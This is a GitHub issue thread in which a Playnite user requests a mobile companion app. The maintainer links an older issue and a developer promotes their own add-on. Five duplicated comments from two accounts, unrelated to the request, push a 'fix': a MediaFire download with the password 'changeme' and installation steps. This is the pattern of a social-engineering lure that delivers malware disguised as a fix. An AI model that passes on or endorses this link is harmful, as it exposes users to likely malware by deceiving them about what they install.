### ISSUE TITLE
Mobile App

### ISSUE THREAD

**Issue by SyCoREAPER** [JosefNemec/Playnite#3812]
### Feature description

Firstly, thank you for creating this amazing piece of Software. It has made portable gaming (Legion Go and Rog Ally) tolerable and you got right what multimillion dollars can't. 

What would be great would be a companion app with all (most) the same functionality in terms of sorting, showing your games, etc..

It wouldn't even need to do the lifting IMO. Just let it sync to the computer app to import your library and then view it on Android or iPhone. 
Having one conclusive place while on the go to look up my games would be amazing. 

Thanks again for the work and dedication to this project to all involved.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by JosefNemec** [comment]
#323

**Comment by PushpakB3096** [comment]
If you mainly want your Playnite library on your phone without remoting into the PC, PlayLog covers that via a Playnite add-on + Android app:

https://www.playlog.online

(I'm the author. Not affiliated with Playnite core.)
